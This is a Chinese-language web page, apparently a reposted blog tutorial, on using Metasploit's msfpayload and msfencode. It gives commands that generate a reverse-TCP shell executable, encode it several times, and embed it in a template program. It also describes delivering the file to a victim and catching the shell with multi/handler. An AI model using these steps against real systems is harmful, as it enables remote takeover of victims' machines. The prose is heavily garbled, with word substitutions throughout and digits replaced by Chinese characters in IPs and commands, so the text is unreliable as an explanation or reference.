|
|
|
联系客服020-83701501

msfpayload和msfencode的介绍

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
msfpayload和msfencode的介绍 网上说用msfpayload 天生什么注入进程什么袭击后门,后边的注入进程是威吓人的,即是1种进程隐藏技术不睬解没弥留(注释1下:进程注入是指将可爱意的可履行代码注入到1个已经运行的进程1般是不法琐细进程,到达来隐藏自身的目标。
msfpayload 这个东西首要的依顺即是将Metasploit 中的 payloads(东西载荷)包装成1个可履行的文件,或者包装成指定的类型,msfpayload或是将包装好的数据输入,默认的输入装备为终端(即是 阿谁打开的黑窗口)。间接输入到终端上有或者输入乱码,着实这不是乱码,当数据被输入到终端是哄骗的是2进制,而终端显露的是2进制对应字符。也或是指定 输入到别的处所,例如网上的例子大全副是 msfpayload windows/shell/reverse_tcp X >;/root/test.exe 这1句的阿谁大于号“>”是个 重定向符,非论是linux下照样windows下重定向符有两种 1种是 >; 另1种是 >>; ,第1种的传染感动是输入到后边指定的文件中假如文件具有则笼盖文件中的内容,另1种是假如文件具有则将数据追加文件末尾的。也或是哄骗 管道标记 管道标记位 ”|“ 不搜罗双引号,意思是前边的顺序输入的数据通过这个管道输入到后边的顺序中 。 msfpayload windows/shell/reverse_tcp LHOST=12七.0.0.1 R | msfencode -t exe -o /root/testss*e 这个例子中就哄骗了管道符来传送数据。
msfencode 这个东西首要的依顺是对输入畴前的数据遏制编码( 假如不指定编码方法则哄骗默认编码方法)。 此后将编码后的数据包装成1个指定的课履行的文件,或者将数据附着到1个指定的已具有的文件上。msfencode 输入数据的方法和msfpayload1样,假如没有指定输入方法则默认输入到屏幕,msfencode或是哄骗重定向符(夙昔已经说过了)来输入数据到 文件,或者哄骗自带的 -o 参数来指定文件。msfencode编码的数据滥觞或是是管道传送畴前的数据也或是是哄骗 -i 参数指定的数据文件。msfencode 的 -i 所指定的数据文件1般来讲不能使1个残破的可履行文件,msfencode -i notpad.exe -t exe -x cmd -t exe -o cmdnotpad。exe 这句话兴奋是 将notpad。exe 哄骗默认编码 附着到cmd.exe 下 输入为 cmdnotpad.exe ,多么做或是可以输入cmdnotpad.exe文件,但不能运行,我料想msfencode只对原始数据遏制编码 ,而原始数据或是哄骗 msfpayload 开首指定1个 R 参数来获取,网上没找到相关的阐明,有找到的说1声,这些都是我的料想巴望是精确的。即是说msfencode 不能对未便文件遏制编码。 下面分袂看1下 msfpayload 和 msfencode 的帮助
msfpayload 的帮助绝对容易
Usage: /opt/metasploit/msf三/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]*]e|[D]ll|[V]BA|[W]ar> OPTIONS: -h Help banner
-l List available payloads msfpayload 的哄骗体例 msfpayload payload var=val specifyformate 注释:msfpayload后边跟payload ,var=val发扬阐发payload要设置的变量比如 LHOST=ip specifyformate 指定输入的格局 输十分式在帮助文档中已经阐领略<[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]*]e|[D]ll|[V]BA| [W]ar> 输入语言格局哄骗1个字母代表1种语言格局。 msfpayload 哄骗的步调:
1 msfpayload -l 列出可供决议的payload
2 msfpayload payload-name O 后边跟的是1个大写的O 搜查payload 的要设置的参数
三 设置参数 天生文件 假如必要编码则用msfencode遏制编码,例如 msfpayload windows/shell/reverse_tcp LHOST=12七.0.0.1 X &gt;/root/a.exe 4 将天生的a.exe 传到网上 或给受害者
五 带动msfconsole 此后use exploits/multi/handler 此后 set PAYLOAD windows/shell/reverse_tcp 这里payload 要设置成跟前边的1样,参数也要1样 set LHOST 12七.0.0.1 (真实情况下肯定不是这个ip)此后exploit 期待用户履行a.exe msfencode 的帮助要绝对容易1点
OPTIONS: -a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: ̵6;x00xff̵七;
-c <opt> The number of times to encode the data
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,war
-v Increase verbosity
-x <opt> Specify an alternate executable template
个中,参数-i 指定必要编码的文件(或顺序段),
-a 指定CPU 的类型,
-b 指定必要去除的字符,帮助中的示例00 ff 这两种数值在网络传送中会被截断造成传送凋射
-c 指定编码次数,
-d 指定 exe模板搜寻路径,
-i 指定要编码的数据文件
-k 设置天生的文件运行后的payload进程与模板文件进程撮合。
-l 列出可用payload
-n 输入编码器动态
-o 输入文件
-p 指定编码平台 linux or windows
-s 指定编码后的字节数(payload的)
-t 天生文件类型
msfencode 哄骗步调
首先 获取要编码的数据 1般来讲用 msfpayload 来天生 test.raw
此后 msfencode -l 列出编码
开首 编码并天生文件 msfencode -i test.raw -e encoder(编码器) -c 5 (编码次数自身制定 ) -t exe(也或是是别的类型的) -o a.exe
假如要对数据哄骗多种编码器遏制编码 则除了开首1个编码器输入的数据类型为可履行的外夙昔的必须为 raw (原始数据类型)
例子
msfencode -i test.raw -e encoder1 -c 5 -t raw | msfencode -e encoder2 -c 三 -t exe -o a.exe
假如熟谙了前面介绍的管道和msfencode所能编码的数据格局,自身就能推出来如何遏制屡次编码。 开首说1下 msfencode 只是针对payload 遏制的编码 并未对 文件模板遏制编码

原文link:http://backtrackzone.blog.51cto.com/5612649/94658七

由网络安全攻防研究室(www.91ri.org)动态安全小组收集整理。

数安新闻+更多

证书相关+更多